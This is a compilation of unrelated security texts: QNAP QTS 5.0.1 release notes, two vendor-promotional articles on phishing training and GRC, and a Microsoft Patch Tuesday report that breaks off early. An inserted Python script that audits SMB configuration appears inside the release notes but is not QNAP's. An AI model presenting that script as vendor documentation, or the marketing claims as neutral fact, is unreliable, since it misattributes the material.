Qnap QTS 5.0.1.2145 build 20220903

2022-09-15

Applicable Models

  • HS-251+,S2
  • QMiroPlus-201W
  • Mustang-F100,Mustang-V100,Mustang-200-i7-1T-32G-R10,Mustang-200-i5-1T-32G-R10,Mustang-200-C-8G-R10,Mustang-200
  • QBoat Sunny
  • QGD-1600P
  • QGD-1602P
  • QGD-3014-16PT
  • TS-453S Pro,TS-853S Pro
  • TS-531P
  • TS-216,TS-416
  • TS-128A,TS-228A,TS-212P3,TS-130,D1 Rev-B
  • TS-231P3,TS-431P3
  • TS-231P2,TS-431P2
  • TS-831X,TS-531X,TS-431X,TS-431X2,TS-431X3,TS-431KX
  • TS-431XU,TS-831XU,TS-1231XU,TS-431XU-RP,TS-831XU-RP,TS-1231XU-RP,TS-431XeU
  • TS-932X,TS-832X,TS-332X,TS-532X,TS-932PX,TS-832PX
  • TS-432XU-RP,TS-432XU,TS-832XU-RP,TS-832XU,TS-1232XU-RP,TS-1232XU,TS-432PXU,TS-432PXU-RP,TS-832PXU,TS-832PXU-RP,TS-1232PXU,TS-1232PXU-RP
  • TS-133,TS-233,TS-433
  • TS-1635
  • TS-1635AX
  • TS-435XeU
  • TS-231+,TS-431+,TS-131P,TS-231P,TS-431P,TS-131K,TS-231K,TS-431K,D2,D4,D4 Rev-B
  • TS-251,TS-451,TS-651,TS-851,TS-451S,TS-251+,TS-451+,TS-351,D2 Pro Rev-B,D4 Pro Rev-B
  • TS-251A,TS-451A,D2 Pro,D4 Pro
  • TS-251B
  • TS-451DeU,TS-453DU,TS-453DU-RP,TS-853DU-RP,TS-1253DU-RP
  • TS-451U
  • TS-253 Pro,TS-453 Pro,TS-653 Pro,TS-853 Pro,TS-453mini,IS-453S
  • TS-453Bmini,TS-253B,TS-453B,TS-653B,TS-253Be,TS-453Be,TS-453BT3
  • TS-853BU,TS-853BU-RP,TS-1253BU,TS-1253BU-RP,TS-453BU,TS-453BU-RP
  • HS-453DX,TBS-453DX,TS-251D,TS-253D,TS-653D,TS-453D,TS-451D,TS-453Dmini,TS-451D2
  • TBS-453A,TS-253A,TS-453A,TS-653A,TS-853A,D6 Pro,D8 Pro
  • TS-453U,TS-853U,TS-1253U,TS-453U-RP,TS-853U-RP,TS-1253U-RP,R4
  • TVS-463,TVS-663,TVS-863,TVS-863+,TS-563,TS-963X,TS-963N
  • TS-463U,TS-463U-RP,TS-863U,TS-863U-RP,TS-1263U,TS-1263U-RP,TS-463XU,TS-463XU-RP,TS-863XU,TS-863XU-RP,TS-1263XU,TS-1263XU-RP
  • TS-564,HS-264,TBS-464,TS-262C,TS-462C,TS-264C,TS-464C,TS-364,TS-464,TS-664
  • TS-464U,TS-464U-RP,TS-1264U-RP,TS-464eU,TS-864eU,TS-864eU-RP
  • TVS-471,TVS-671,TVS-871,TVS-871T
  • TVS-871U-RP,TVS-1271U-RP,TVS-471U-RP,TVS-471U,R8
  • TVS-672N,TVS-872N,TVS-872X,TVS-672X,TVS-472X,TVS-472XT,TVS-672XT,TVS-872XT
  • TVS-872XU,TVS-872XU-RP,TVS-1272XU-RP,TVS-1672XU-RP,TVS-2472XU-RP,TVS-972XU,TVS-972XU-RP
  • TVS-473,TVS-673,TVS-873,TVS-473e,TVS-673e,TVS-873e
  • TS-h973AX,TS-473A,TS-673A,TS-873A
  • TS-873AU,TS-873AU-RP,TS-1273AU-RP,TS-1673AU-RP,TS-873AeU,TS-873AeU-RP
  • TS-873U,TS-1273U,TS-1673U,TS-873U-RP,TS-1273U-RP,TS-1673U-RP
  • TVS-675
  • TVS-h875U,TVS-h875U-RP,TVS-h1275U-RP,TVS-h1675U-RP
  • TS-1277,TS-877,TS-677,TS-1677X
  • TS-877XU,TS-877XU-RP,TS-1277XU-RP,TS-1677XU-RP,TS-2477XU-RP,TS-977XU-RP,TS-977XU,TS-h1277XU-RP,TS-h977XU-RP,TS-h1677XU-RP,TS-h2477XU-RP
  • TS-EC880 Pro,TS-EC1080 Pro,TVS-EC880,TVS-EC1080,TVS-EC1080+
  • TS-EC880U,TS-EC1280U,TS-EC1680U,TS-EC2480U R2,TVS-EC1280U-SAS-RP R2,TVS-EC1580MU-SAS-RP R2,TVS-EC1680U-SAS-RP R2,TVS-EC2480U-SAS-RP R2,TS-EC2480U,TS-EC880U R2,TS-EC1280U R2,TS-EC1680U R2,TVS-EC1280U-SAS-RP,TVS-EC1580MU-SAS-RP,TVS-EC1680U-SAS-RP,TVS-EC2480U-SAS-RP,R12,R16,R24
  • TVS-682,TVS-882,TVS-1282,TVS-882BR,TVS-882T,TVS-1282T,TVS-682T,TVS-1282T3,TVS-882BRT3
  • TVS-1582TU
  • TS-883XU,TS-883XU-RP,TS-1283XU-RP,TS-1683XU-RP,TS-983XU,TS-983XU-RP,TS-2483XU-RP,TS-h1283XU-RP,TS-h2483XU-RP,TS-h1683XU-RP
  • TS-1685,TS-h886,TS-h686
  • TES-3085U,TES-1885U,TS-1886XU-RP,TS-h1886XU-RP,TS-h1886XU-RP R2
  • TS-2888X,TVS-h1688X,TVS-h1288X
  • TS-h3088XU-RP
  • TDS-16489U
  • TS-h2490FU,TS-h1090FU
  • TS-328,TS-428,TS-230,D2 Rev-B
  • TS-551
  • TS-473,TS-673,TS-873
  • TVS-951X,TVS-951N
  • GM-1000,TNS-h1083X,TNS-h1083X (A Side),TNS-h1083X (B Side)
  • TS-i410X, TS-410E
  • TS-253E,TS-453E
  • TS-h1290FX
  • TVS-882ST,TVS-882ST3
  • TS-h987XU-RP,TS-h1887XU-RP,TS-h2287XU-RP,TS-h3087XU-RP
  • TVS-h474,TVS-h674,TVS-h874

Important Notes

  • Out-of-the-box QTS 5.0.1 automatically installs security updates by default. Nevertheless, if you update the firmware from QTS 5.0.0 to 5.0.1, QTS will keep your existing firmware update settings. We recommend checking your firmware update settings in Control Panel > Firmware Update.
  • Removed support for the following developer tools: Node.js v4, Node.js v6, Node.js v8, and Ruby on Rails.
  • Removed support for the following apps or tools: Mono, Perl, and AlarmClock. We recommend running these apps or tools using Container Station if needed.
  • When a release candidate has proven to be stable enough for public use, we name this release candidate as an official release. You will not be notified again for official firmware update if you have already updated your system to this release candidate.

New Features

Control Panel
  • QTS now supports access protection settings for RTRR and Rsync protocols in Control Panel > System > Security.
  • Administrators can now enforce 2-step verification on specific users or groups and then check their current verification status. After this enforcement, selected users must complete 2-step verification setup before proceeding to other operations.
  • To ensure device security, you can now choose to disable USB ports to block all USB devices or only USB storage devices.
Desktop & Login
  • You can now configure the desktop icon size and font size in Desktop > Task Bar > Options > Wallpaper.
File Station
  • You can now share a shared folder via a share link.
Network & Virtual Switch
  • Network & Virtual Switch now displays MTU (Maximum Transmission Unit) values for network interfaces.
SAMBA
  • QTS now supports Microsoft Windows Search Protocol. This allows you to perform quick searches for files and folders in NAS shared folders mounted on Windows 10 via SMB.
Storage & Snapshots
  • Storage & Snapshots now displays topology diagrams for SAS JBOD expansion enclosures to help visualize the arrangement of your storage devices.
  • To ensure the availability of your data, Storage & Snapshots now supports “Replace & Detach”, which allows you to copy data from a faulty disk to a spare disk and then safely detach the faulty disk.
  • You can now use exFAT on ARM-based models without purchasing an exFAT license. Note that we have already added this support for x86-based models in an earlier update.
  • Added support for TCG-Enterprise SEDs. Storage & Snapshots can now display SED types.
  • Snapshot Replica now supports 2-step verification.
  • You can now specify a snapshot deletion policy in Storage & Snapshots > Global Settings.

Enhancement

Control Panel
  • Added an option to force users to change their password upon their first login.
  • Added the following features in Control Panel to optimize the mechanism and workflow of firmware updates:
    • Merged live update settings and auto update settings into a single user interface.
    • Enhanced notifications for firmware updates. Users can choose to postpone or cancel updates before the scheduled update time.
    • Introduced a new update type: important security updates. We recommend selecting this update type in auto update settings to ensure your device security.
  • QTS now displays a warning message in Control Panel > System > Hardware > Hardware Resources when you select a graphics card installed on a PCIe slot that does not support PCIe passthrough.
  • When importing users, you can now choose to require imported users to change their password upon their first login.
  • Shortened the waiting period for auto firmware updates. QTS now starts an auto update within only one hour from the scheduled time if a new firmware version is available for your device.
  • Administrators can now choose to receive notifications upon login if a recommended firmware update is available. (This feature is enabled by default).
  • The default UPS policy is now set to “auto-protection mode” after NAS initialization.
  • You can now create a one-time power schedule.
  • QTS now provides an option in Control Panel to disable the power button. This prevents unexpected shutdown when users press the power button by accident.
  • To prevent malicious usernames and to ensure device security, QTS no longer allows usernames that contain the following characters: { } $ and the space character.
File Station
  • File Station can now convert Apple iWork files to Microsoft Office formats with CloudConvert API v2.
  • Optimized the results of file name sorting for all languages. This helps deliver more consistent sorting results.
  • File Station now provides more information for background tasks to help you understand the detail, status, and progress of each task.
  • Share links now display file thumbnails and allow you to select and download multiple files at the same time. We have also enhanced the UI design to improve your file sharing experience.
Network & Virtual Switch
  • Upgraded jQuery to 3.5.1.
  • Improved the information for the system default gateway and NCSI (Network Connectivity Status Indicator) in Network & Virtual Switch to better explain their behaviors.
  • The TS-x77XU and TS-x83XU models can now update firmware for their network interface cards via Advanced Network Driver.
PHP System Module
  • Upgraded the built-in PHP version to 7.4.20.
SAMBA
  • Users can now enable SMB signing for NAS devices that do not join a domain. To enable this setting, go to Control Panel > Network & File Services > Win/Mac/NFS/WebDAV > Microsoft Networking > Advanced Options.
  • To prevent malware and ransomware from exploiting SMB v1 vulnerabilities, QTS now automatically raises the lowest allowed SMB version to SMB v2 if it was set to SMB v1 before this firmware update.
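The two SMB hardening changes above (no SMB v1 as the minimum dialect, SMB signing enforceable on non-domain NAS devices) are things an administrator will want to verify rather than assume. The following is an added example, not QNAP code: it audits an smb.conf-style configuration for exactly those two settings. It assumes the QTS SMB service is Samba-based (the release notes group these items under SAMBA) and that the Control Panel options correspond to the Samba parameters `server min protocol` and `server signing`; the two sample configurations are constructed for the example.

```python
"""Audit an smb.conf-style configuration for SMB1 exposure and signing enforcement.

Added example (not part of QTS). Assumes the NAS SMB service is Samba and that the
QTS Control Panel settings map to the Samba parameters 'server min protocol' and
'server signing'.
"""
import re

# Samba dialect names that belong to the SMB1 family. Any of these as the
# server minimum means SMB1 clients are still accepted.
SMB1_DIALECTS = {"CORE", "COREPLUS", "LANMAN1", "LANMAN2", "NT1"}

# Constructed sample: the pre-update state the release notes describe.
WEAK_CONFIG = """\
[global]
    workgroup = WORKGROUP
    server min protocol = NT1
    server signing = disabled
[Public]
    path = /share/Public
"""

# Constructed sample: the state after raising the minimum dialect and enforcing signing.
HARDENED_CONFIG = """\
[global]
    workgroup = WORKGROUP
    server min protocol = SMB2
    server signing = mandatory
[Public]
    path = /share/Public
"""


def parse_smb_conf(text):
    """Parse smb.conf text into {section: {parameter: value}}.

    Parameter names are normalised the way Samba treats them: case-insensitive
    and with internal whitespace ignored. Comment lines (# or ;) and blank lines
    are skipped; parameters before the first [section] header are ignored.
    """
    config = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            section = header.group(1).strip().lower()
            config.setdefault(section, {})
            continue
        if "=" not in line or section is None:
            continue
        key, value = line.split("=", 1)
        key = re.sub(r"\s+", "", key).lower()
        config[section][key] = value.strip()
    return config


def audit_smb_config(text):
    """Return a list of (code, message) findings for the [global] section."""
    glob = parse_smb_conf(text).get("global", {})
    findings = []

    min_proto = glob.get("serverminprotocol")
    if min_proto is None:
        findings.append(("MIN_PROTOCOL_UNSET",
                         "server min protocol is not set explicitly; set it to "
                         "SMB2 or higher so SMB1 dialects are refused"))
    elif min_proto.upper() in SMB1_DIALECTS:
        findings.append(("SMB1_ALLOWED",
                         f"server min protocol = {min_proto} still accepts SMB1 "
                         "clients; raise it to SMB2 or higher"))

    # Only 'mandatory' guarantees that a client cannot negotiate an unsigned session.
    signing = glob.get("serversigning", "default").lower()
    if signing != "mandatory":
        findings.append(("SIGNING_NOT_ENFORCED",
                         f"server signing = {signing}; set it to mandatory so "
                         "SMB sessions are always signed"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        findings = audit_smb_config(cfg)
        print(f"{name}: {'no findings' if not findings else ''}")
        for code, message in findings:
            print(f"  [{code}] {message}")
```

Running the script reports `SMB1_ALLOWED` and `SIGNING_NOT_ENFORCED` for the weak sample and nothing for the hardened one; a configuration that omits `server min protocol` entirely is reported as `MIN_PROTOCOL_UNSET`, because the effective minimum then depends on the Samba version's default rather than on an explicit choice.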
Storage & Snapshots
  • Updated Seagate IronWolf Health Management (IHM) to 2.1.1 to add support for the following drive models: IronWolf 525 SSD 2TB (ZP2000NM30002), IronWolf 525 SSD 1TB (ZP1000NM30002), IronWolf 525 SSD 500GB (ZP500NM30002), IronWolf 16TB (ST16000VN001), IronWolf 14TB (ST14000VN0008), IronWolf Pro 20TB (ST20000NE000), IronWolf 18TB (ST18000VN000), IronWolf 4TB (ST4000VN006).
  • Storage & Snapshots now supports zooming in on hardware model drawings to display component details.
  • Improved the user interface of Snapshot Replica to further enhance usability and user experience.
  • Storage & Snapshots now also displays Snapshot Replica information in Overview > Volume/LUN.

Fixed Issues

  • Fixed an issue where user storage quota would be reset to the default value after users restarted the NAS.

Known Issues

  • QTS and QuTS hero with newer kernel versions do not support ATTO Fibre Channel adapters. If you have already installed an ATTO Fibre Channel adapter on your device, we do not recommend updating the firmware to QTS 5.0.1 or QuTS hero h5.0.1 for the time being.
  • Thunderbolt connection between the NAS and Mac sometimes cannot automatically resume after users restart the NAS.
  • Users cannot connect to the destination NAS of a Snapshot Replica job if their usernames contain a space.
  • After waking up from sleep, the TS-x51 and TS-x53 models cannot detect external drives that do not support sleep mode.
  • Network connection issues may occur when users add both 10 GbE ports of the QXG-10G2SF-CX4 network expansion card to a virtual switch.
  • Users sometimes cannot switch between different FEC (Forward Error Correction) modes for the QXG-25G2SF-CX6LX network expansion card.
  • On some earlier NAS models with ARM processors, heavy I/O operations may cause network connection issues for the QNA-UC5G1T USB-to-Ethernet adapter.

Other Changes

App Center
  • In App Center, the option “Allow installation of applications without a valid digital signature” is now disabled by default after firmware update.
Control Panel
  • Removed certain device information from the login screen to enhance device security.
  • To ensure device security, the “admin” account cannot use the default password (the MAC address of the first network adapter) when changing the password.
Desktop & Login
  • Instead of using the generic alias “appuser”, QuLog Center and Desktop Dashboard now display actual usernames when users access system resources and services via a client app.
  • To enhance device security, the system now asks the “admin” user to change the password when the user logs in with the default password (the MAC address of the first network adapter).
License
  • You no longer need a license to operate QuTScloud installed in Virtualization Station. Note that License Center 1.7.5 (or later) is required for this change.
Storage & Snapshots
  • For a more intuitive workflow, Storage & Snapshots now shows various options (such as “Remove” and “Expand”) on the “Action” menu in Pool/Volume Management.
  • Storage & Snapshots now provides clearer information for the results of IronWolf Health Management (IHM) tests. This allows you to easily check the health of your IronWolf drives.
  • You can now quickly identify and repair volumes that may have potential issues after a power outage or an abnormal shutdown. In Storage & Snapshots > Overview, we now add a link that allows you to perform a file system check on such volumes.
  • VJBOD currently does not support encrypted LUNs.
  • Adjusted some settings in the Volume Creation Wizard to enhance user experience. Thin volume is now the default volume type for volume creation.

Source:
https://www.qnap.com/it-it/release-notes/qts/5.0.1.2145/20220903?ref=nas_product

5 Ways to Mitigate Your New Insider Threats in the Great Resignation

Companies are in the midst of an employee “turnover tsunami” with no signs of a slowdown. According to Fortune Magazine, 40% of the U.S. workforce is considering quitting their jobs. This trend – coined the great resignation – creates instability in organizations. High employee turnover increases security risks, leaving companies more vulnerable to attacks that exploit human factors.

Statistics presented at Davos 2022 connect the turmoil of the great resignation to the rise of new insider threats. Security teams are feeling the impact, and keeping up with employee security is harder than ever. Companies need a fresh approach to close the gaps and prevent attacks. This article examines what your security teams must do within the new organizational dynamics to address these unique challenges quickly and effectively.

Handling Your New Insider Threats

Implementing a successful security awareness program is more challenging than ever for your security team: the new blood coming in causes cultural dissonance. Every new employee brings their own security habits, behavior, and ways of working. Changing habits is slow, yet companies don’t have the luxury of time. They must get ahead of hackers to prevent attacks from new insider threats.

Be sure to handle your organization’s security high-impact risks:

  • Prevent data loss – When employees leave, there’s a high risk of sensitive data leaks. Manage off-boarding and close lurking dormant emails to prevent data loss.
  • Maintain best practices – When new employees join the organization, even if security training is well conducted, they’re not on par with their peers. Unknown security habits may put the organization at risk.
  • Ensure friendly reminders – With less staff, employees are overburdened and pressured. Security may be “forgotten” or neglected in the process.
  • Support remote work – To support rapid employee recruitment, working from home is a must. Remote work flexibility helps to attract and retain new employees.
  • Train on the go – Remote work requires securing remote devices and dealing with new employee behavior amid the inherent distractions of working on the go and at home.

5 Preventive Measures for High Impact in Your Organization

Security teams must protect companies against new phishing attempts within the high workforce flux. Practical security training is key to countering hackers. New techniques and practices are required to support remote work and new behavioral challenges, especially during times of high employee turnover. To succeed, your training must keep cyber awareness fresh for all staff. It must genuinely transform the behavior of your new employees.

Here are five preventive measures to effectively protect your organization for cyber resilience:

Ensure all staff get continuous training

Security risks are constantly evolving and ever-present. All employees are needed to protect against sophisticated phishing threats. It’s even more complicated in the great resignation. With new weak links, your company is at the greatest risk. Gullible employees leave security ‘holes’ in your organization’s front line. Security teams are well aware of the risks.

Research shows that companies must continuously train 100% of their staff every month. Yet, employees spend little time thinking about security.

Automated security awareness training like CybeReady makes it easier to manage security training for all your staff.

  • Instead of manual work, use new, in-depth BI data and reports to guide your training plan for new and experienced employees.
  • Adjust difficulty level to the role, geography, and risk, to flexibly control your diverse employee needs and vulnerabilities.
  • Raise employee awareness of threats.
  • Prevent hacker exploitation and emergency triage with company leadership.

Target new employees

Your security depends on employee help and cooperation. Build best practices on the job. Threat basics aren’t enough to stop malicious actors. Whether in the office or working remotely, security training must foster mastery. Start with low difficulty. Create a foundation. Continually promote learning to the next level. To be effective, you must understand and cater to your employees’ needs and ways of working.

Simply sending out emails to employees is not enough for a robust learning experience. With security awareness platforms like CybeReady, training becomes more scientific for continuous, accurate analysis of your security awareness.

  • Adjust your training simulations to employee contexts and frequency for mastery.
  • Set difficulty level depending on employee behavior and results.
  • Use intensive, bite-size intervals for success.
  • By varying attack scenarios, new employees get proper onboarding.
  • Put security on the top of the mind of all your staff.

Prioritize your highest risk groups

For a cyber awareness training program to be successful, security teams must plan, operate, evaluate and adapt accordingly. Forecasting actual difficulty and targeting groups can be complex. Security teams must determine future attack campaigns based on employee behavior and address challenges in a given scenario.

With data-driven platforms like CybeReady, your security teams monitor campaign performance to fine-tune employee defense.

  • Build custom high-intensity training campaigns for your high-risk groups.
  • Focus on specific challenges for concrete results, such as:
    1) Password and data requests
    2) Messages from seemingly legitimate senders and sources
    3) Realistic content tailored to a specific department or role
  • Adapt your training for both individuals and attack vectors while respecting employee privacy.
  • Shift problematic group behavior to best practices.

Keep busy staff vigilant

Security is 24/7. Keep your training unpredictable to maintain employee vigilance. Send surprising simulation campaigns in a continuous cycle. Catch employees off guard for the best learning. To create high engagement, ensure your training content is relevant to daily actions. Use short, frequent, and intriguing content in their own language. Tailor to local references and current news.

With scientific, data-based simulations like CybeReady, companies mimic the rapidly changing attack environment – plus, tick all your compliance boxes for a complete solution. Stay abreast of evolving global phishing trends as they vary around the world. Focus all your employees on the attacker styles and scenarios most popular in their geographies and languages. Adjust frequency to personal and group risk.

Ensure long-term results for every employee

Take advantage of the ‘golden moment.’ Just-in-time learning is the key to the most effective results. Instead of random enforcement training often irrelevant to employees, make a lasting impression right when mistakes happen. Ensure that your training uses this limited window of time. People are likelier to remember the experience and change behavior the next time.

With data science-driven cyber security training platforms like CybeReady, security teams seize the moment of failure for long-term results. With just-in-time learning, employees immediately get training on mistakes made upon falling for a simulation. They retain critical knowledge and respond better in future attack scenarios. With a new awareness of risks, transform learning into new behaviors.

Cutting Your Security Risks with a New Level of Employee Awareness

In global organizations today, seamlessly integrating the latest security know-how into everyday work is a must to counter the new risks of the great resignation. It’s more important than ever for every employee to get up to speed for high cyber resilience quickly.

Download the CybeReady Playbook to learn how CybeReady’s fully automated security awareness training platform provides the fast, concrete results you need with virtually zero IT effort, or schedule a product demo with one of our experts.

Source:
https://thehackernews.com/2022/09/5-ways-to-mitigate-your-new-insider.html

How GRC protects the value of organizations — A simple guide to data quality and integrity

Contemporary organizations understand the importance of data and its impact on improving interactions with customers, offering quality products or services, and building loyalty.

Data is fundamental to business success. It allows companies to make the right decisions at the right time and deliver the high-quality, personalized products and services that customers expect.

There is a challenge, though.

Businesses are collecting more data than ever before, and new technologies have accelerated this process dramatically. As a result, organizations have significant volumes of data, making it hard to manage, protect, and get value from it.

Here is where Governance, Risk, and Compliance (GRC) comes in. GRC enables companies to define and implement the best practices, procedures, and governance to ensure the data is clean, safe, and reliable across the board.

More importantly, organizations can use GRC platforms like StandardFusion to create an organizational culture around security. The objective is to encourage everyone to understand how their actions affect the business’s success.

Now, the big question is:

Are organizations getting value from their data?

To answer that, first, it’s important to understand the following two concepts.

Data quality

Data quality represents how reliably the information serves an organization’s specific needs — mainly supporting decision-making.

Some of these needs might be:

  • Operations – Where and how can we be more efficient?
  • Resource distribution – Do we have any excess? Where? And why?
  • Planning – How likely is this scenario to occur? What can we do about it?
  • Management – What methods are working? What processes need improvement?

From a GRC standpoint, companies can achieve data quality by creating rules and policies so the entire organization can use that data in the same ways. These policies could, for example, define how to label, transfer, process, and maintain information.

Data Integrity

Data integrity focuses on the trustworthiness of the information in terms of its physical and logical validity. Some of the key characteristics to ensure the usability of data are:

  • Consistency
  • Accuracy
  • Validity
  • Truthfulness

GRC’s goal for data integrity is to keep the information reliable by eliminating unwanted changes between updates or modifications. It is all about the data’s accuracy, availability, and trust.

How GRC empowers organizations to achieve high-quality data

Organizations that want to leverage their data to generate value must ensure the information they collect is helpful and truthful. The following are the key characteristics of high-quality data:

  • Completeness: The expected data to make decisions is present.
  • Uniqueness: There is no duplication of data.
  • Timeliness: The data is up-to-date and available to use when needed.
  • Validity: The information has the proper format and matches the requirements.
  • Accuracy: The data describes the object correctly in a real-world context.
  • Consistency: The data must be the same across multiple databases.

A powerful way to make sure the company’s data maintains these six characteristics is by leveraging the power of GRC.

Why?

Because GRC empowers organizations to set standards, regulations, and security controls that avoid mistakes, standardize tasks, and guide personnel when collecting and handling vital information.

GRC helps organizations answer the following questions:

  • How is the company ensuring that data is available for internal decisions and for clients?
  • Is everyone taking the proper steps to collect and process data?
  • Have redundancies been removed?
  • Is the organization prepared for unexpected events?
  • Does the organization have a backup system?
  • Are the key processes standardized?

Overall, GRC aims to build shared attitudes and actions towards security.

Why every organization needs high-quality data and how GRC helps

Unless the data companies collect is high-quality and trustworthy, there’s no value in it — it becomes a liability and a risk for the organization.

Modern companies recognize data as an essential asset that impacts their bottom line. Furthermore, they understand that poor data quality can damage credibility, reduce sales, and minimize growth.

In today’s world, organizations are aiming to be data-driven. However, becoming a data-driven organization is tough without a GRC program.

How so?

Governance, Risk, and Compliance enable organizations to protect and manage data quality by creating standardized, controlled, and repeatable processes. This is key because every piece of data an organization processes has an associated risk.

By understanding these risks, companies can implement the necessary controls and policies for handling and extracting data correctly so that every department can access the same quality information.

Organizations without structured data can’t provide any value, and they face the following risks:

  • Missed opportunities: Many leads are lost because of incomplete or inaccurate data. Also, incorrect data means wrong insights, resulting in missing critical business opportunities.
  • Lost revenue: According to Gartner’s 2021 research, the average financial impact of poor data quality on organizations is $12.9 million annually.
  • Poor customer experience: When data quality is poor, organizations can’t identify customers’ pain points and preferences. As a result, the offer of products or services doesn’t match customers’ needs and expectations.
  • Lack of compliance: In some industries where regulations control relationships or customer transactions, maintaining good-quality data can be the difference between compliance and fines of millions of dollars. GRC is vital to keep compliance in the loop as new regulations evolve worldwide.
  • Increased expenses: A few years ago, IBM’s research showed that businesses lost 3.1 trillion dollars in the US alone. How? Spending time to find the correct data, fixing errors, and just hunting for information and confirmed sources.
  • Misanalysis: Around 84% of CEOs are concerned about the quality of data they are deciding on. Wrong data will lead to bad decisions and ultimately damage operations, finances, HR, and every area within the company.
  • Reputational damage: In today’s world, customers spend a lot of their time reading reviews before making a decision. For instance, if a company fails to satisfy its customers, everyone will know.
  • Reduced efficiency: Poor data quality forces employees to do manual data quality checks, losing time and money.

To sum up:

Having the right processes to manipulate data will prevent organizations from missing business opportunities, damaging their reputation, and doing unnecessary repetitive tasks.

How GRC supports data-driven business and what are the key benefits of clean data

Data-driven businesses embrace the use of data (and its analysis) to get insights that can improve the organization. The efficient management of big data through GRC tools helps identify new business opportunities, strengthen customer experiences, grow sales, improve operations, and more.

For example, GRC helps data-driven businesses by allowing them to create and manage the right policies to process and protect the company’s data.

More importantly, organizations can also control individual policies to ensure they have been distributed and acknowledged accordingly.

In terms of benefits, although clean data has numerous “easy-to-identify” benefits, many others are not easily identified. Trustworthy data not only improves efficiency and results; it also helps with fundamental, vital factors that affect business performance and success.

What are these factors?

Fundamental benefits:

  • Profits/Revenue
  • Internal communication
  • Employees’ confidence to share information
  • Company’s reputation
  • Trust

Operational benefits:

  • Efficiency
  • Business outcome
  • Privacy issues
  • Customer satisfaction
  • Better audience-targeting

How GRC protects the value of businesses and their data

In this contemporary world, companies should be measured not only via existing financial measurements but also by the amount of monetizable data they can capture, consume, store and use. More importantly, how the data helps the organization’s internal processes to be faster and more agile.

When people think of high-quality data and big data, they usually associate these two with big organizations, especially technology and social media platforms. However, large volumes of quality data give organizations of any size plenty of benefits.

Data quality and integrity help organizations to:

  • Understand their clients
  • Enhance business operations
  • Understand industry best practices
  • Identify the best partnership options
  • Strengthen business culture
  • Deliver better results
  • Make more money

Using the right GRC platform helps companies create and control the policies and practices to ensure their data is valid, consistent, accurate, and complete — allowing them to get all these benefits.

The key to using GRC tools is that businesses can produce what customers expect on a greater scale and with higher precision and velocity.

Now, what does this have to do with value?

By protecting the value of data, organizations are protecting their overall worth. Indeed, GRC empowers companies to create a culture of value, giving everyone education and agency so they can make better decisions.

Also, GRC helps companies tell better security stories. These stories aim to build trust with customers and partners, enter new markets, and shorten sale cycles.

To summarize:

A better understanding of customers and processes — through data — will lead to better products and services, enhanced experiences, and long-lasting relationships with customers. All these represent growth and more revenue for companies.

What happens when a company’s data is not safe? Can it damage their value?

Trust is a vital component of any interaction (business or personal) and, as such, it is mandatory for organizations to protect it — without trust, there is no business.

When data is not protected, the chances of breaches are higher, causing direct and indirect costs.

Direct costs are:

  • Fines
  • Lawsuits
  • Stolen information
  • Compensations
  • Potential business loss

Indirect costs are:

  • Reputation/Trust
  • PR activities
  • Lost revenue from downtime
  • New and better protection

Often, reputation damages can cause long-term harm to organizations, making it hard for them to acquire and maintain business. In fact, reputation loss is the company’s biggest worry, followed by financial costs, system damage, and downtime.

So, what does all this mean?

It’s not just about collecting data; it is also about how companies reduce risks and leverage and protect the data they have. GRC integrates data security, helping organizations be better prepared against unauthorized access, corruption, or theft.

Moreover, GRC tools can help elevate data security by controlling policies, regulations, and predictable issues within the organization.

The bottom line?

When companies can’t get or maintain customers because of a lack of trust, the organization’s value will be significantly lower — or even zero. Unfortunately, this is even more true for small and medium-sized companies.

How to use GRC to achieve and maintain high-quality data?

Many organizations have trouble managing their data, which, unfortunately, leads to poor decisions and a lack of trust from employees and customers.

Moreover, although companies know how costly wrong information is, many are not working on ensuring quality data through the right processes and controls. In fact, Harvard Business Review reported that 47% of newly created data records have at least one critical error.

Why is that?

Because there is a lack of focus on the right processes and systems that need to be in place to ensure quality data.

What do poor processes cause?

  • Human errors
  • Wrong data handling
  • Inaccurate formatting
  • Different sets of data for various departments
  • Unawareness of risks
  • Incorrect data input or extraction

Fortunately, GRC’s primary goal is to develop the right policies and procedures to ensure everyone in the organization appropriately manages the data.

GRC aims to create a data structure based on the proper governance that will dictate how people organize and handle the company’s information. As a result, GRC will empower companies to be able to extract value from their data.

That is not everything.

Governance, Risk, and Compliance allows organizations to understand the risks associated with data handling and guides managers to create and distribute the policies that will support any data-related activity.

The following are some of the ways GRC is used to achieve and maintain high-quality data:

  • Data governance: Data governance is more than setting rules and telling people what to do. Instead, it is a collection of processes, roles, policies, standards, and metrics that will lead to a cultural change to ensure effective management of information throughout the organization.
  • Education: Achieving good data quality is not easy. It requires a deep understanding of data quality principles, processes, and technologies. GRC facilitates the education process by allowing the organization to seamlessly implement, share, and communicate its policies and standards to every department.
  • Everyone is involved: Everyone must understand the organization’s goal for data quality and the different processes and approaches that will be implemented. GRC focuses on cultural change.
  • Be aware of threats: When managing data, each process has risks associated with it. The mission of GRC is for the organization to recognize and deal with potential threats effectively. When companies are aware of risks, they can implement the necessary controls and rules to protect the data.
  • One single source of truth: A single source of truth ensures everyone in the organization makes decisions based on the same consistent and accurate data. GRC can help by defining the governance over data usage and manipulation. Furthermore, GRC makes it easy to communicate policies, see who the policy creator is, and ensure employees are acting according to the standards.

Get a free consultation with StandardFusion to learn more about how GRC and data governance can boost your organization’s value.

Source :
https://thehackernews.com/2022/09/how-grc-protects-value-of-organizations.html

Microsoft’s Latest Security Update Fixes 64 New Flaws, Including a Zero-Day

Tech giant Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks.

Of the 64 bugs, five are rated Critical, 57 are rated Important, one is rated Moderate, and one is rated Low in severity. The patches are in addition to 16 vulnerabilities that Microsoft addressed in its Chromium-based Edge browser earlier this month.

“In terms of CVEs released, this Patch Tuesday may appear on the lighter side in comparison to other months,” Bharat Jogi, director of vulnerability and threat research at Qualys, said in a statement shared with The Hacker News.

“However, this month hit a sizable milestone for the calendar year, with MSFT having fixed the 1000th CVE of 2022 – likely on track to surpass 2021 which patched 1,200 CVEs in total.”


The actively exploited vulnerability in question is CVE-2022-37969 (CVSS score: 7.8), a privilege escalation flaw affecting the Windows Common Log File System (CLFS) Driver, which could be leveraged by an adversary to gain SYSTEM privileges on an already compromised asset.

